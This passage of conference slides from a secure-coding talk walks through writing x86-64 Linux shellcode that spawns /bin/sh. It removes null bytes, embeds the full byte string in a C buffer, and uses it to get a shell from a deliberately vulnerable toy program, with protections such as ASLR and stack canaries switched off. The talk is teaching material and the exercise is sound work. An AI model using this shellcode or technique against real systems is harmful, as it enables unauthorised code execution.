  • 71. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 71 @pati_gallardo
  • 72. 72 $ hellowargames$ clang -save-temps -Os -static -fno-stack-protector -o shellcode shellcode.c wargames$ ./shellcode $ wargames$ ldd shellcode not a dynamic executable Build it statically, with no canary @pati_gallardo
  • 73. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 73 @pati_gallardo
  • 74. 74 $ hellowargames$ objdump -d shellcode | grep -A 14 "<main>" 0000000000400b30 <main>: 400b30: 48 83 ec 18 sub $0x18,%rsp 400b34: 31 ff xor %edi,%edi 400b36: e8 15 8b 04 00 callq 449650 <__close> 400b3b: bf 44 1f 49 00 mov $0x491f44,%edi 400b40: be 02 00 00 00 mov $0x2,%esi 400b45: 31 c0 xor %eax,%eax 400b47: e8 a4 85 04 00 callq 4490f0 <__libc_open> 400b4c: b8 4d 1f 49 00 mov $0x491f4d,%eax 400b51: 66 48 0f 6e c0 movq %rax,%xmm0 400b56: 48 89 e6 mov %rsp,%rsi 400b59: 66 0f 7f 06 movdqa %xmm0,(%rsi) 400b5d: bf 4d 1f 49 00 mov $0x491f4d,%edi 400b62: 31 d2 xor %edx,%edx 400b64: e8 47 7f 04 00 callq 448ab0 <__execve> Look at the assembly of main @pati_gallardo
  • 75. 75 %rax # System call %rdi %rsi %rdx %r10 0x3 3 sys_close unsigned int fd 0x3b 59 sys_execve const char * filename const char * const argv[] const char * const envp[] 0x101 257 sys_openat int dfd const char * filename int flags int mode The syscalls involved @pati_gallardo
  • 76. 76 $ hellowargames$ objdump -d shellcode | grep -A 6 "<__close>:" 0000000000449650 <__close>: 449650: 8b 05 b6 31 27 00 mov 0x2731b6(%rip),%eax 449656: 85 c0 test %eax,%eax 449658: 75 16 jne 449670 <__close+0x20> 44965a: b8 03 00 00 00 mov $0x3,%eax 44965f: 0f 05 syscall 449661: 48 3d 00 f0 ff ff cmp $0xfffffffffffff000,%rax %rax # System call %rdi 0x3 3 sys_close unsigned int fd @pati_gallardo
  • 77. 77 $ hello shellcode_asm.c // -------------------------------------------------------- // close // -------------------------------------------------------- "xor %rdi, %rdint" // Zero out rdi - without using 0 "xor %rax, %raxnt" // Zero out rax - without using 0 "mov $0x3, %alnt" // Write the syscall number (3) to al "syscallnt" // Do the syscall %rax # System call %rdi 0x3 3 sys_close unsigned int fd @pati_gallardo
  • 78. 78 $ hello wargames$ objdump -d shellcode | grep -A 30 "<__libc_open>:" 00000000004490f0 <__libc_open>: 4490f0: 48 83 ec 68 sub $0x68,%rsp 4490f4: 41 89 f2 mov %esi,%r10d 4490f7: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 4490fe: 00 00 449100: 48 89 44 24 28 mov %rax,0x28(%rsp) 449105: 31 c0 xor %eax,%eax 449107: 41 83 e2 40 and $0x40,%r10d 44910b: 48 89 54 24 40 mov %rdx,0x40(%rsp) 449110: 75 4e jne 449160 <__libc_open+0x70> 449112: 89 f0 mov %esi,%eax 449114: 25 00 00 41 00 and $0x410000,%eax 449119: 3d 00 00 41 00 cmp $0x410000,%eax 44911e: 74 40 je 449160 <__libc_open+0x70> 449120: 8b 05 e6 36 27 00 mov 0x2736e6(%rip),%eax 449126: 85 c0 test %eax,%eax 449128: 75 61 jne 44918b <__libc_open+0x9b> 44912a: 89 f2 mov %esi,%edx 44912c: b8 01 01 00 00 mov $0x101,%eax 449131: 48 89 fe mov %rdi,%rsi 449134: bf 9c ff ff ff mov $0xffffff9c,%edi 449139: 0f 05 syscall %rax # System call %rdi %rsi %rdx %r10 0x101 257 sys_openat int dfd const char * filename int flags int mode @pati_gallardo
  • 79. 79 $ hello shellcode_asm.c // -------------------------------------------------------- // open // -------------------------------------------------------- "xor %rax, %raxnt" // Zero out rax - without using 0 "push %raxnt" // Push a string terminator "movabs $0x7974742f7665642f, %rbxnt" // Put the string in rbx: // /dev/tty = 2f 64 65 76 2f 74 74 79 "push %rbxnt" // Push rbx on the stack "mov %rsp, %rsint" // Put a pointer to the string in rsi "xor %rdx, %rdxnt" // Zero out rdx - without using 0 "xor %rdi, %rdint" // Zero out rdi - without using 0 "xor %r10, %r10nt" // Zero out r10 - without using 0 "mov $0x101, %eaxnt" // Write the syscall number (257) "syscallnt" // Do the syscall %rax # System call %rdi %rsi %rdx %r10 0x101 257 sys_openat int dfd const char * filename int flags int mode @pati_gallardo
  • 80. 80 $ hellowargames$ objdump -d shellcode | grep -A 3 "<__execve>:" 0000000000448ab0 <__execve>: 448ab0: b8 3b 00 00 00 mov $0x3b,%eax 448ab5: 0f 05 syscall 448ab7: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax %rax # System call %rdi %rsi %rdx 0x3b 59 sys_execve const char * filename const char * const argv[] const char * const envp[] @pati_gallardo
  • 81. 81 $ hello shellcode_asm.c // -------------------------------------------------------- // execve // -------------------------------------------------------- "xor %rdx, %rdxnt" // Zero out rdx - without using 0 "xor %rax, %raxnt" // Zero out rax - without using 0 "push %raxnt" // Push a string terminator "movabs $0x68732f2f6e69622f, %rbxnt" // Put the string in rbx: // /bin//sh = 2f 62 69 6e 2f 2f 73 68 "push %rbxnt" // Push rbx on the stack "mov %rsp, %rdint" // Put a pointer to the string in rdi "push %rdxnt" // Push a null to terminate the array "push %rdint" // Push the pointer to the string "mov %rsp, %rsint" // Put a pointer to argv in rsi "mov $0x3b, %alnt" // Write the syscall number 59 to al "syscallnt" // Do the syscall %rax # System call %rdi %rsi %rdx 0x3b 59 sys_execve const char * filename const char * const argv[] const char * const envp[] @pati_gallardo
  • 82. 82 $ hellowargames$ clang -o shellcode_asm shellcode_asm.c wargames$ ./shellcode_asm $ Compile and test the assembly @pati_gallardo ✔
  • 83. 83 @pati_gallardowargames$ objdump -d shellcode_asm | grep -A 29 "<main>" 400480: 55 push %rbp 400481: 48 89 e5 mov %rsp,%rbp 400484: 48 31 ff xor %rdi,%rdi 400487: 48 31 c0 xor %rax,%rax 40048a: b0 03 mov $0x3,%al 40048c: 0f 05 syscall 40048e: 48 31 c0 xor %rax,%rax 400491: 50 push %rax 400492: 48 bb 2f 64 65 76 2f movabs $0x7974742f7665642f,%rbx 400499: 74 74 79 40049c: 53 push %rbx 40049d: 48 89 e6 mov %rsp,%rsi 4004a0: 48 31 d2 xor %rdx,%rdx 4004a3: 48 31 ff xor %rdi,%rdi 4004a6: 4d 31 d2 xor %r10,%r10 4004a9: b8 01 01 00 00 mov $0x101,%eax 4004ae: 0f 05 syscall 4004b0: 48 31 d2 xor %rdx,%rdx 4004b3: 48 31 c0 xor %rax,%rax 4004b6: 50 push %rax 4004b7: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx 4004be: 2f 73 68 4004c1: 53 push %rbx 4004c2: 48 89 e7 mov %rsp,%rdi 4004c5: 52 push %rdx 4004c6: 57 push %rdi 4004c7: 48 89 e6 mov %rsp,%rsi 4004ca: b0 3b mov $0x3b,%al 4004cc: 0f 05 syscall Look at the assembly of main Null bytes in the shellcode!
  • 84. 84 $ hello shellcode_asm.c // -------------------------------------------------------- // open // -------------------------------------------------------- "xor %rax, %raxnt" // Zero out rax - without using 0 "push %raxnt" // Push a string terminator "movabs $0x7974742f7665642f, %rbxnt" // Put the string in rbx: // /dev/tty = 2f 64 65 76 2f 74 74 79 "push %rbxnt" // Push rbx on the stack "mov %rsp, %rsint" // Put a pointer to the string in rsi "xor %rdx, %rdxnt" // Zero out rdx - without using 0 "xor %rdi, %rdint" // Zero out rdi - without using 0 "xor %r10, %r10nt" // Zero out r10 - without using 0 "mov $0x101, %eaxnt" // Write syscall number 257 to eax "syscallnt" // Do the syscall @pati_gallardo %rax # System call %rdi %rsi %rdx %r10 0x101 257 sys_openat int dfd const char * filename int flags int mode
  • 85. 85 $ hello shellcode_asm.c "mov $0xFF, %alnt" // Write syscall number 255 to al "inc %raxnt" "inc %raxnt" //"mov $0x101, %eaxnt" // Write syscall number 257 to eax %rax # System call %rdi %rsi %rdx %r10 0x101 257 sys_openat int dfd const char * filename int flags int mode @pati_gallardo Write 255 and inc it twice
  • 86. 86 @pati_gallardowargames$ objdump -d shellcode_asm | grep -A 31 "<main>" 0000000000400480 <main>: 400480: 55 push %rbp 400481: 48 89 e5 mov %rsp,%rbp 400484: 48 31 ff xor %rdi,%rdi 400487: 48 31 c0 xor %rax,%rax 40048a: b0 03 mov $0x3,%al 40048c: 0f 05 syscall 40048e: 48 31 c0 xor %rax,%rax 400491: 50 push %rax 400492: 48 bb 2f 64 65 76 2f movabs $0x7974742f7665642f,%rbx 400499: 74 74 79 40049c: 53 push %rbx 40049d: 48 89 e6 mov %rsp,%rsi 4004a0: 48 31 d2 xor %rdx,%rdx 4004a3: 48 31 ff xor %rdi,%rdi 4004a6: 4d 31 d2 xor %r10,%r10 4004a9: b0 ff mov $0xff,%al 4004ab: 48 ff c0 inc %rax 4004ae: 48 ff c0 inc %rax 4004b1: 0f 05 syscall 4004b3: 48 31 d2 xor %rdx,%rdx 4004b6: 48 31 c0 xor %rax,%rax 4004b9: 50 push %rax 4004ba: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx 4004c1: 2f 73 68 4004c4: 53 push %rbx 4004c5: 48 89 e7 mov %rsp,%rdi 4004c8: 52 push %rdx 4004c9: 57 push %rdi 4004ca: 48 89 e6 mov %rsp,%rsi 4004cd: b0 3b mov $0x3b,%al 4004cf: 0f 05 syscall Look at the assembly of main close open execve
  • 87. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 87 @pati_gallardo
  • 88. 88 shellcode_test.c @pati_gallardochar shellcode[] = "x48x31xff" // xor %rdi,%rdi "x48x31xc0" // xor %rax,%rax "xb0x03" // mov $0x3,%al "x0fx05" // syscall "x48x31xc0" // xor %rax,%rax "x50" // push %rax "x48xbbx2fx64x65x76x2f" // movabs $0x7974742f7665642f,%rbx "x74x74x79" // "x53" // push %rbx "x48x89xe6" // mov %rsp,%rsi "x48x31xd2" // xor %rdx,%rdx "x48x31xff" // xor %rdi,%rdi "x4dx31xd2" // xor %r10,%r10 "xb0xff" // mov $0xff,%al "x48xffxc0" // inc %rax "x48xffxc0" // inc %rax "x0fx05" // syscall "x48x31xd2" // xor %rdx,%rdx "x48x31xc0" // xor %rax,%rax "x50" // push %rax "x48xbbx2fx62x69x6ex2f" // movabs $0x68732f2f6e69622f,%rbx "x2fx73x68" // "x53" // push %rbx "x48x89xe7" // mov %rsp,%rdi "x52" // push %rdx "x57" // push %rdi "x48x89xe6" // mov %rsp,%rsi "xb0x3b" // mov $0x3b,%al "x0fx05"; // syscall close open execve Let’s put the bytes in a char buffer
  • 89. 89 $ hello shellcode_close_test.c int main() { printf("len:%lu bytesn", strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; } Let’s run the char buffer @pati_gallardo
  • 90. 90 $ hello$ clang -z execstack -o shellcode_test shellcode_test.c $ ./shellcode_test len:77 bytes $ Compile and test the assembly @pati_gallardo ✔
  • 91. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 91 @pati_gallardo
  • 92. 92 $ hellowargames$ clang -o shellcode_exploit shellcode_exploit.c wargames$ ./shellcode_exploit > file wargames$ gdb -q ./launch_bigger (gdb) r < file Starting program: ./launch_bigger < file WarGames MissileLauncher v0.1 0x7fffffffdc90 Secret: Access denied process 29337 is executing new program: /bin/dash $ Use the exploit in gdb @pati_gallardo ✔
  • 94. 94 $ hellowargames$ ./shellcode_exploit | ./launch_bigger WarGames MissileLauncher v0.1 0x7fffffffdd10 Secret: Access denied $ Use the exploit with pipe @pati_gallardo ✔
  • 96. Cheats - We turned off ASLR - We made the stack executable - We turned off stack canaries - We printed the address of the buffer @pati_gallardo 96
  • 97. Examples of newer exploit techniques - Information Leaks - to defy ASLR - Return Oriented Programming - to defy non-executable stack @pati_gallardo 97
  • 98. The Target The Exploit @pati_gallardo @halvarflake98 Weird State Weird State Programming the Weird Machine Vulnerability @sergeybratus
  • 99. Programs need to be deterministically correct Exploits need to be probabilistically correct 99 @pati_gallardo
  • 100. Exploit Development is Programming the Weird Machine 100 @pati_gallardo
  • 101. Turtle Sec Questions? Inspired by the training (In)Security in C++, Secure Coding Practices in C++ Patricia Aas, TurtleSec @pati_gallardo
  • 102. Turtle Sec Photos from pixabay.com Patricia Aas, TurtleSec @pati_gallardo
  • 104. 104 LINUX SYSTEM CALL TABLE FOR X86 64 http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/ Hex to decimal converter https://www.rapidtables.com/convert/number/hex-to-decimal.html https://www.asciitohex.com Weird machines, exploitability, and provable unexploitability - Thomas Dullien/Halvar Flake https://vimeo.com/252868605 Resources @pati_gallardo